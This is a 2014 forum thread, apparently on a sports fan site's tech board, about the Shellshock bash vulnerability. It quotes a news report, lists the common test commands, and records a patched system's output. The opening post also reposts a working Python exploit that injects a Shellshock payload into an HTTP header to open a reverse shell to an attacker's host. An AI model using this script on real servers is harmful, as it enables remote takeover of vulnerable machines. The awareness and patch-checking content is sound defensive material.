[LINUX] New 'shellshock' bash remote execution vulnerability

SwoLy-D · Sep 26, 2014

For those of you, like me, who work in Linux systems and who are users or admins of those machines... this will be of interest:

bash remote execution vulnerability

Updated A bug discovered in the widely used Bash command interpreter poses a critical security risk to Unix and Linux systems – and, thanks to their ubiquity, the internet at large.

It lands countless websites, servers, PCs, OS X Macs, various home routers, and more, in danger of hijacking by hackers.

The vulnerability is present in Bash up to and including version 4.3, and was discovered by Stephane Chazelas. It puts Apache web servers, in particular, at risk of compromise: CGI scripts that use or invoke Bash in any way – including any child processes spawned by the scripts – are vulnerable to remote-code injection. OpenSSH and some DHCP clients are also affected on machines that use Bash.

Ubuntu and other Debian-derived systems that use Dash exclusively are not at risk – Dash isn't vulnerable, but busted versions of Bash may well be present on the systems anyway. It's essential you check the shell interpreters you're using, and any Bash packages you have installed, and patch if necessary.

"Holy cow. There are a lot of .mil and .gov sites that are going to get owned," security expert Kenn White said on Wednesday in reaction to the disclosed flaw.

The 22-year-old bug, dating back to version 1.13, lies in Bash's handling of environment variables: when assigning a function to a variable, trailing code in the function definition will be executed, leaving the door wide open for code-injection attacks. The vulnerability is exploitable remotely if code can be smuggled into environment variables sent over the network – and it's surprisingly easy to do so.
Click to expand...

MORE at the link.

You can check if you're vulnerable by running the following lines in your default shell, which on many systems will be Bash. If you see the words "busted", then you're at risk. If not, then either your Bash is fixed or your shell is using another interpreter.
Click to expand...
Code:
env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
env X="() { :;} ; echo busted" `which bash` -c "echo completed"
Here's a reverse shell from:
<blockquote class="twitter-tweet" lang="en"><p>That bash bug is bad ( <a href="https://t.co/60kPlziiVv">https://t.co/60kPlziiVv</a> ) Get a reverse shell on a vulnerable website <a href="http://t.co/7JDCvZVU3S">http://t.co/7JDCvZVU3S</a> by <a href="https://twitter.com/ortegaalfredo">@ortegaalfredo</a></p>— Chris Williams (@diodesign) <a href="https://twitter.com/diodesign/status/514865664499015680">September 24, 2014</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
Code:
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
	print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
	exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
	"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
Hope your systems are all OK, sys admins.

bobrek · Sep 26, 2014

And, the original fix for CVE-2014-6271 was incomplete. CVE-2014-7169 was issued.

Xerobull · Sep 26, 2014

This will be the bug that shuts up the OSx/Unix/Linux is safe from viruseses! crowd. Nothing is safe from malware.

SwoLy-D · Sep 26, 2014

Xerobull said: ↑

This will be the bug that shuts up the OSx/Unix/Linux is safe from viruseses! crowd.
Click to expand...

Ummm... this has always been there.

This bug isn't a virus. Technically, still safe from viruses.

Xerobull · Sep 26, 2014

SwoLy-D said: ↑

Ummm... this has always been there.

This bug isn't a virus. Technically, still safe from viruses.
Click to expand...

Whatever, fanboy.

SwoLy-D · Sep 26, 2014

Xerobull said: ↑

Whatever, fanboy.
Click to expand...

I'm not a fanboy. I use all. I manage all types of Web servers. I'm just not the main server admin.

Be versatile in your skills, man.

GimmeDaRock · Sep 26, 2014

[root@gateway ~]# env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
/bin/sh: warning: X: ignoring function definition attempt
/bin/sh: error importing function definition for `X'
completed
[root@gateway ~]# ls -la /bin/sh
lrwxrwxrwx 1 root root 4 Sep 26 05:35 /bin/sh -> bash
[root@gateway ~]# env X="() { :;} ; echo busted" `which bash` -c "echo completed"
/bin/bash: warning: X: ignoring function definition attempt
/bin/bash: error importing function definition for `X'
completed

Mr. Brightside · Sep 26, 2014

Hey Swoly. I know English isn't your first language, but I have no idea what any of this means.

SwoLy-D · Sep 28, 2014

Mr. Brightside said: ↑

Hey Swoly. I know English isn't your first language, but I have no idea what any of this means.
Click to expand...

*Good for you, man. GOOD FOR YOU.

*I mean that you don't have to deal with all this iSht.

Xerobull · Sep 28, 2014

SwoLy-D said: ↑

I'm not a fanboy. I use all. I manage all types of Web servers. I'm just not the main server admin.

Be versatile in your skills, man.
Click to expand...

I am.

Be versatile in your sense of humor, hombre.

Forums

[LINUX] New 'shellshock' bash remote execution vulnerability

SwoLy-D Contributing Member

bobrek Politics belong in the D & D

Xerobull You son of a b!tch! I'm in!

SwoLy-D Contributing Member

Xerobull You son of a b!tch! I'm in!

SwoLy-D Contributing Member

GimmeDaRock Contributing Member

Mr. Brightside Contributing Member

SwoLy-D Contributing Member

Xerobull You son of a b!tch! I'm in!

Share This Page

About ClutchFans

Rockets Content

Support ClutchFans!